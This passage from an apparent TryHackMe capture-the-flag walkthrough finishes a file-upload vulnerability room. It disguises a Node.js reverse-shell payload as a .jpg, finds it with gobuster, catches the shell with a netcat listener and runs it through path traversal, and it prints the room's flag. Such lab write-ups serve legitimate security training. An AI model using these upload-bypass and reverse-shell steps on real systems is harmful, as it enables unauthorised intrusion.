    return /a/; // Prevents the Node.js application form crashing
})();

Save it as shell.js.

Scratch that. Let’s get ready to upload the file. Make sure that the frontend filters are still disabled (you haven’t refreshed the main page).

  1. Edit the payload.js with the correct ip and take note of the port. Rename the file to shell.jpg. This also changes the MIME type, and thus also gets us past that filter!

Note: Instead of renaming the file extension, we could also have intercepted the POST request when uploading the file, and change the MIME type from js to that of a jpg file.

Before editing:

After editing:

This should get the file uploaded. Now it is time to figure out where it is by running gobuster once more with the attached wordlist.

gobuster dir -u http://jewel.uploadvulns.thm/content -w UploadVulnsWordList.txt -x jpg

Take a look at all files, one of them is your payload. Write down the name of this file.

UTT.jpg is the file!

Remember the admin page? We can run the payload from there by writing: ../content/<filename>. Before doing that though, start a netcat listener with the correct port set in the payload script!

nc -lvnp 4242

Afterwards, run the payload!

You should get a reverse shell now, and the flag! Great job and I hope you learned as much as I did.

Answer: THM{NzRlYTUwNTIzODMwMWZhMzBiY2JlZWU2}


Task 12 (Conclusion)

Well, that’s us done. Hopefully you have learnt something from completing this room. This was a very brief introduction to the basics of file upload vulnerabilities — there is a lot more to learn! Use what you’ve learnt here to go and research more advanced exploits related to malicious file uploads.

Now that you’ve finished the room, remember to revert the changes you made your hosts file, way back in Task 1.

As a reminder, here are the commands to do so.

On Linux or MacOS:

sudo sed -i '$d' / etc/hosts

On Windows:

(GC C:\Windows\System32\drivers\ etc\hosts | select -Skiplast 1) | SC C:\Windows\System32\drivers\ etc\hosts

Questions

Room completed, and hosts file reverted!

Answer: No answer needed


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